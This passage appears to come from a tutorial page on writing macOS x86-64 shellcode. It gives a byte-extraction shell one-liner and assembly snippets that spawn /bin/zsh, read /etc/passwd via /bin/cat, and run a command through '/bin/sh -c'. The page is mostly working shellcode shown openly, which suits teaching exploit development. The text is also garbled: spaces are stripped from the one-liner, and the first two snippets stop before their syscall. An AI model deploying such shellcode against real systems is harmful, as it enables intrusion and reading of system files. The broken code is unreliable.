# Code from https://github.com/daem0nc0re/macOS_ARM64_Shellcode/blob/b729f716aaf24cbc8109e0d94681ccb84c0b0c9e/helper/extract.shfor c in $(objdump-d"shell.o"|grep-E'[0-9a-f]+:'|cut-f1|cut-d:-f2) ; doecho-n'\\x'$cdone# Another optionotool-tshell.o|grep00|cut-f2-d$'\t'|sed's/ /\\x/g'|sed's/^/\\x/g'|sed's/\\x$//g'
#### Shell
<div data-gb-custom-block data-tag="tabs">
<div data-gb-custom-block data-tag="tab" data-title='使用 adr'>
bits 64
global _main
call r_cmd64
db '/bin/zsh', 0
r_cmd64: ; the call placed a pointer to db (argv[2])
pop rdi ; arg1 from the stack placed by the call to l_cmd64
xor rdx, rdx ; store null arg3
push 59 ; put 59 on the stack (execve syscall)
pop rax ; pop it to RAX
bts rax, 25 ; set the 25th bit to 1 (to add 0x2000000 without using null bytes)
bits 64
global _main
xor rdx, rdx ; zero our RDX
push rdx ; push NULL string terminator
mov rbx, '/bin/zsh' ; move the path into RBX
push rbx ; push the path, to the stack
mov rdi, rsp ; store the stack pointer in RDI (arg1)
push 59 ; put 59 on the stack (execve syscall)
pop rax ; pop it to RAX
bts rax, 25 ; set the 25th bit to 1 (to add 0x2000000 without using null bytes)
bits 64
section .text
global _main
; Prepare the arguments for the execve syscall
sub rsp, 40 ; Allocate space on the stack similar to `sub sp, sp, #48`
lea rdi, [rel cat_path] ; rdi will hold the address of "/bin/cat"
lea rsi, [rel passwd_path] ; rsi will hold the address of "/etc/passwd"
; Create inside the stack the array of args: ["/bin/cat", "/etc/passwd"]
push rsi ; Add "/etc/passwd" to the stack (arg0)
push rdi ; Add "/bin/cat" to the stack (arg1)
; Set in the 2nd argument of exec the addr of the array
mov rsi, rsp ; argv=rsp - store RSP's value in RSI
xor rdx, rdx ; Clear rdx to hold NULL (no environment variables)
push 59 ; put 59 on the stack (execve syscall)
pop rax ; pop it to RAX
bts rax, 25 ; set the 25th bit to 1 (to add 0x2000000 without using null bytes)
syscall ; Make the syscall
section .data
cat_path: db "/bin/cat", 0
passwd_path: db "/etc/passwd", 0
使用 sh 调用命令
bits 64
section .text
global _main
; Prepare the arguments for the execve syscall
sub rsp, 32 ; Create space on the stack
; Argument array
lea rdi, [rel touch_command]
push rdi ; push &"touch /tmp/lalala"
lea rdi, [rel sh_c_option]
push rdi ; push &"-c"
lea rdi, [rel sh_path]
push rdi ; push &"/bin/sh"
; execve syscall
mov rsi, rsp ; rsi = pointer to argument array
xor rdx, rdx ; rdx = NULL (no env variables)
push 59 ; put 59 on the stack (execve syscall)
pop rax ; pop it to RAX
bts rax, 25 ; set the 25th bit to 1 (to add 0x2000000 without using null bytes)
xor rdi, rdi ; Exit status code 0
push 1 ; put 1 on the stack (exit syscall)
pop rax ; pop it to RAX
bts rax, 25 ; set the 25th bit to 1 (to add 0x2000000 without using null bytes)
section .data
sh_path: db "/bin/sh", 0
sh_c_option: db "-c", 0
touch_command: db "touch /tmp/lalala", 0